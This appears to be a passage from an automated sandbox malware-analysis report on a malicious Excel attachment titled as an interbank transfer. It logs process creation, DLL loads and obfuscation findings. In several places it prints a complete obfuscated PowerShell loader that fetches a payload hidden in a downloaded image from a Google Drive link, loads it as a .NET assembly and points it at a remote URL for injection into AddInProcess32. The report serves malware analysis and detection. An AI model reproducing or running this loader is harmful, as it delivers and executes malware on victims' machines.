SG9tZV0uR2V0TWV0aG9kKGd3MFZBSWd3MCk7a0Z2dmFpTWV0aG9kLkludm9rZShrRnYnKydudWxsLCBAKGd3MHR4dC5hYWFhYWJld21hZGFtLzMxLjEnKyczLjI3MS43MCcrJzEvLzpwdHRoJysnZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZXNhdGl2YWRvZ3cwLCBndzBBZGRJblByb2Nlc3MzMmd3MCwgZ3cwZGVzYXRpdmFkb2d3MCwgZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvJysnZ3cwLGd3MGRlc2F0aXZhJysnZG9ndzAsZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvZ3cwLGd3MGRlc2F0aXZhZG9ndzAsZ3cwMWd3MCxndzBkZXNhdGl2YWRvZ3cwKScrJyk7JykuUmVQbGFDZSgndzVjJyxbU3RySW5HXVtDaEFSXTEyNCkuUmVQbGFDZSgna0Z2JywnJCcpLlJlUGxhQ2UoKFtDaEFSXTEwMytbQ2hBUl0xMTkrW0NoQVJdNDgpLFtTdHJJbkddW0NoQVJdMzkpIHwgJiAoKHZhcklBQkxFICcqTWRyKicpLk5hbWVbMywxMSwyXS1KT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('kFvimageUrl'+' = '+'gw0https://drive.google.'+'co'+'m/uc?exp'+'ort=download&id=1AIVgJJJv1F6vS4sUOybnH-sD'+'vUhBYwur gw0;kFv'+'webClient = New-Object System.Net.WebCl'+'ient;kF'+'vima'+'geBytes = '+'kFvwebClient.'+'DownloadData(kFvimageUrl);kFvimageText = [System.Text.E'+'ncoding]::UTF8.GetStrin'+'g(kFvimageBytes);kFvstartFlag = gw0<<BASE64_START>>gw0;kFvend'+'Flag = gw0<<BA'+'SE64_END>>gw0;kFvstartInde'+'x = kFvimageText.IndexOf(kFvstartFlag);kF'+'vendIndex = kFvimageText.I'+'ndexOf(kFvendFl'+'ag);kFvstartIndex -ge 0 -'+'a'+'nd kFvendIndex '+'-gt kFvstartIndex;kFvstartIndex += kFvstartFlag.Length;kFvbase64Length = kFvendIndex - kFvstartIndex;kFvbase64Command = kFvimageText.Substring(kFvstartInd'+'ex, kFvbase64Length);kFvbase64Reversed = -join (kFvbase64Command.ToCharArray()'+' w5'+'c ForEach-Object { kFv_ })[-1..-(kFvbase64Command.Length)];kFvcommandBytes = [System.Convert]::From'+'Base64String(kFvbase64Reverse'+'d);kFvloadedAssembly = [Syste'+'m.Reflection.Assembly]::Load(kFvcommandBytes);kFvvaiMethod = [dnlib.IO.Home].GetMethod(gw0VAIgw0);kFvvaiMethod.Invoke(kFv'+'null, @(gw0txt.aaaaabewmadam/31.1'+'3.271.70'+'1//:ptth'+'gw0, gw0de'+'sativadogw0, gw0de'+'sativadogw0, gw0desativadogw0, gw0AddInProcess32gw0, gw0desativadogw0, gw0desativadogw0,gw0desativado'+'gw0,gw0desativa'+'dogw0,gw0desativadogw0,gw0desativadogw0,gw0desativadogw0,gw01gw0,gw0desativadogw0)'+');').RePlaCe('w5c',[StrInG][ChAR]124).RePlaCe('kFv','$').RePlaCe(([ChAR]103+[ChAR]119+[ChAR]48),[StrInG][ChAR]39) | & ((varIABLE '*Mdr*').Name[3,11,2]-JOin'')"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightdatingloverxxx.vbs" Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdrRnZpbWFnZVVybCcrJyA9ICcrJ2d3MGh0dHBzOi8vZHJpdmUuZ29vZ2xlLicrJ2NvJysnbS91Yz9leHAnKydvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRCcrJ3ZVaEJZd3VyIGd3MDtrRnYnKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2wnKydpZW50O2tGJysndmltYScrJ2dlQnl0ZXMgPSAnKydrRnZ3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKGtGdmltYWdlVXJsKTtrRnZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRScrJ25jb2RpbmddOjpVVEY4LkdldFN0cmluJysnZyhrRnZpbWFnZUJ5dGVzKTtrRnZzdGFydEZsYWcgPSBndzA8PEJBU0U2NF9TVEFSVD4+Z3cwO2tGdmVuZCcrJ0ZsYWcgPSBndzA8PEJBJysnU0U2NF9FTkQ+Pmd3MDtrRnZzdGFydEluZGUnKyd4ID0ga0Z2aW1hZ2VUZXh0LkluZGV4T2Yoa0Z2c3RhcnRGbGFnKTtrRicrJ3ZlbmRJbmRleCA9IGtGdmltYWdlVGV4dC5JJysnbmRleE9mKGtGdmVuZEZsJysnYWcpO2tGdnN0YXJ0SW5kZXggLWdlIDAgLScrJ2EnKyduZCBrRnZlbmRJbmRleCAnKyctZ3Qga0Z2c3RhcnRJbmRleDtrRnZzdGFydEluZGV4ICs9IGtGdnN0YXJ0RmxhZy5MZW5ndGg7a0Z2YmFzZTY0TGVuZ3RoID0ga0Z2ZW5kSW5kZXggLSBrRnZzdGFydEluZGV4O2tGdmJhc2U2NENvbW1hbmQgPSBrRnZpbWFnZVRleHQuU3Vic3RyaW5nKGtGdnN0YXJ0SW5kJysnZXgsIGtGdmJhc2U2NExlbmd0aCk7a0Z2YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoa0Z2YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpJysnIHc1JysnYyBGb3JFYWNoLU9iamVjdCB7IGtGdl8gfSlbLTEuLi0oa0Z2YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtrRnZjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tJysnQmFzZTY0U3RyaW5nKGtGdmJhc2U2NFJldmVyc2UnKydkKTtrRnZsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZScrJ20uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoa0Z2Y29tbWFuZEJ5dGVzKTtrRnZ2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKGd3MFZBSWd3MCk7a0Z2dmFpTWV0aG9kLkludm9rZShrRnYnKydudWxsLCBAKGd3MHR4dC5hYWFhYWJld21hZGFtLzMxLjEnKyczLjI3MS43MCcrJzEvLzpwdHRoJysnZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZXNhdGl2YWRvZ3cwLCBndzBBZGRJblByb2Nlc3MzMmd3MCwgZ3cwZGVzYXRpdmFkb2d3MCwgZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvJysnZ3cwLGd3MGRlc2F0aXZhJysnZG9ndzAsZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvZ3cwLGd3MGRlc2F0aXZhZG9ndzAsZ3cwMWd3MCxndzBkZXNhdGl2YWRvZ3cwKScrJyk7JykuUmVQbGFDZSgndzVjJyxbU3RySW5HXVtDaEFSXTEyNCkuUmVQbGFDZSgna0Z2JywnJCcpLlJlUGxhQ2UoKFtDaEFSXTEwMytbQ2hBUl0xMTkrW0NoQVJdNDgpLFtTdHJJbkddW0NoQVJdMzkpIHwgJiAoKHZhcklBQkxFICcqTWRyKicpLk5hbWVbMywxMSwyXS1KT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('kFvimageUrl'+' = '+'gw0https://drive.google.'+'co'+'m/uc?exp'+'ort=download&id=1AIVgJJJv1F6vS4sUOybnH-sD'+'vUhBYwur gw0;kFv'+'webClient = New-Object System.Net.WebCl'+'ient;kF'+'vima'+'geBytes = '+'kFvwebClient.'+'DownloadData(kFvimageUrl);kFvimageText = [System.Text.E'+'ncoding]::UTF8.GetStrin'+'g(kFvimageBytes);kFvstartFlag = gw0<<BASE64_START>>gw0;kFvend'+'Flag = gw0<<BA'+'SE64_END>>gw0;kFvstartInde'+'x = kFvimageText.IndexOf(kFvstartFlag);kF'+'vendIndex = kFvimageText.I'+'ndexOf(kFvendFl'+'ag);kFvstartIndex -ge 0 -'+'a'+'nd kFvendIndex '+'-gt kFvstartIndex;kFvstartIndex += kFvstartFlag.Length;kFvbase64Length = kFvendIndex - kFvstartIndex;kFvbase64Command = kFvimageText.Substring(kFvstartInd'+'ex, kFvbase64Length);kFvbase64Reversed = -join (kFvbase64Command.ToCharArray()'+' w5'+'c ForEach-Object { kFv_ })[-1..-(kFvbase64Command.Length)];kFvcommandBytes = [System.Convert]::From'+'Base64String(kFvbase64Reverse'+'d);kFvloadedAssembly = [Syste'+'m.Reflection.Assembly]::Load(kFvcommandBytes);kFvvaiMethod = [dnlib.IO.Home].GetMethod(gw0VAIgw0);kFvvaiMethod.Invoke(kFv'+'null, @(gw0txt.aaaaabewmadam/31.1'+'3.271.70'+'1//:ptth'+'gw0, gw0de'+'sativadogw0, gw0de'+'sativadogw0, gw0desativadogw0, gw0AddInProcess32gw0, gw0desativadogw0, gw0desativadogw0,gw0desativado'+'gw0,gw0desativa'+'dogw0,gw0desativadogw0,gw0desativadogw0,gw0desativadogw0,gw01gw0,gw0desativadogw0)'+');').RePlaCe('w5c',[StrInG][ChAR]124).RePlaCe('kFv','$').RePlaCe(([ChAR]103+[ChAR]119+[ChAR]48),[StrInG][ChAR]39) | & ((varIABLE '*Mdr*').Name[3,11,2]-JOin'')"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn2.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntdsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: transferencia interbancaria_66579.xlam.xlsxInitial sample: OLE zip file path = xl/calcChain.xml
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.520018273.0000000000872000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.520018273.0000000000872000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.520018273.0000000000872000.00000004.00000800.00020000.00000000.sdmp
                  Source: transferencia interbancaria_66579.xlam.xlsxInitial sample: OLE indicators vbamacros = False

                  Data Obfuscation

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('kFvimageUrl'+' = '+'gw0https://drive.google.'+'co'+'m/uc?exp'+'ort=download&id=1AIVgJJJv1F6vS4sUOybnH-sD'+'vUhBYwur gw0;kFv'+'webClient = New-Object System.Net.WebCl'+'ient;kF'+'vima'+'geBytes = '+'kFvwebClient.'+'DownloadData(kFvimageUrl);kFvimageText = [System.Text.E'+'ncoding]::UTF8.GetStrin'+'g(kFvimageBytes);kFvstartFlag = gw0<<BASE64_START>>gw0;kFvend'+'Flag = gw0<<BA'+'SE64_END>>gw0;kFvstartInde'+'x = kFvimageText.IndexOf(kFvstartFlag);kF'+'vendIndex = kFvimageText.I'+'ndexOf(kFvendFl'+'ag);kFvstartIndex -ge 0 -'+'a'+'nd kFvendIndex '+'-gt kFvstartIndex;kFvstartIndex += kFvstartFlag.Length;kFvbase64Length = kFvendIndex - kFvstartIndex;kFvbase64Command = kFvimageText.Substring(kFvstartInd'+'ex, kFvbase64Length);kFvbase64Reversed = -join (kFvbase64Command.ToCharArray()'+' w5'+'c ForEach-Object { kFv_ })[-1..-(kFvbase64Command.Length)];kFvcommandBytes = [System.Convert]::From'+'Base64String(kFvbase64Reverse'+'d);kFvloadedAssembly = [Syste'+'m.Reflection.Assembly]::Load(kFvcommandBytes);kFvvaiMethod = [dnlib.IO.Home].GetMethod(gw0VAIgw0);kFvvaiMethod.Invoke(kFv'+'null, @(gw0txt.aaaaabewmadam/31.1'+'3.271.70'+'1//:ptth'+'gw0, gw0de'+'sativadogw0, gw0de'+'sativadogw0, gw0desativadogw0, gw0AddInProcess32gw0, gw0desativadogw0, gw0desativadogw0,gw0desativado'+'gw0,gw0desativa'+'dogw0,gw0desativadogw0,gw0desativadogw0,gw0desativadogw0,gw01gw0,gw0desativadogw0)'+');').RePlaCe('w5c',[StrInG][ChAR]124).RePlaCe('kFv','$').RePlaCe(([ChAR]103+[ChAR]119+[ChAR]48),[StrInG][ChAR]39) | & ((varIABLE '*Mdr*').Name[3,11,2]-JOin'')"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('kFvimageUrl'+' = '+'gw0https://drive.google.'+'co'+'m/uc?exp'+'ort=download&id=1AIVgJJJv1F6vS4sUOybnH-sD'+'vUhBYwur gw0;kFv'+'webClient = New-Object System.Net.WebCl'+'ient;kF'+'vima'+'geBytes = '+'kFvwebClient.'+'DownloadData(kFvimageUrl);kFvimageText = [System.Text.E'+'ncoding]::UTF8.GetStrin'+'g(kFvimageBytes);kFvstartFlag = gw0<<BASE64_START>>gw0;kFvend'+'Flag = gw0<<BA'+'SE64_END>>gw0;kFvstartInde'+'x = kFvimageText.IndexOf(kFvstartFlag);kF'+'vendIndex = kFvimageText.I'+'ndexOf(kFvendFl'+'ag);kFvstartIndex -ge 0 -'+'a'+'nd kFvendIndex '+'-gt kFvstartIndex;kFvstartIndex += kFvstartFlag.Length;kFvbase64Length = kFvendIndex - kFvstartIndex;kFvbase64Command = kFvimageText.Substring(kFvstartInd'+'ex, kFvbase64Length);kFvbase64Reversed = -join (kFvbase64Command.ToCharArray()'+' w5'+'c ForEach-Object { kFv_ })[-1..-(kFvbase64Command.Length)];kFvcommandBytes = [System.Convert]::From'+'Base64String(kFvbase64Reverse'+'d);kFvloadedAssembly = [Syste'+'m.Reflection.Assembly]::Load(kFvcommandBytes);kFvvaiMethod = [dnlib.IO.Home].GetMethod(gw0VAIgw0);kFvvaiMethod.Invoke(kFv'+'null, @(gw0txt.aaaaabewmadam/31.1'+'3.271.70'+'1//:ptth'+'gw0, gw0de'+'sativadogw0, gw0de'+'sativadogw0, gw0desativadogw0, gw0AddInProcess32gw0, gw0desativadogw0, gw0desativadogw0,gw0desativado'+'gw0,gw0desativa'+'dogw0,gw0desativadogw0,gw0desativadogw0,gw0desativadogw0,gw01gw0,gw0desativadogw0)'+');').RePlaCe('w5c',[StrInG][ChAR]124).RePlaCe('kFv','$').RePlaCe(([ChAR]103+[ChAR]119+[ChAR]48),[StrInG][ChAR]39) | & ((varIABLE '*Mdr*').Name[3,11,2]-JOin'')"Jump to behavior
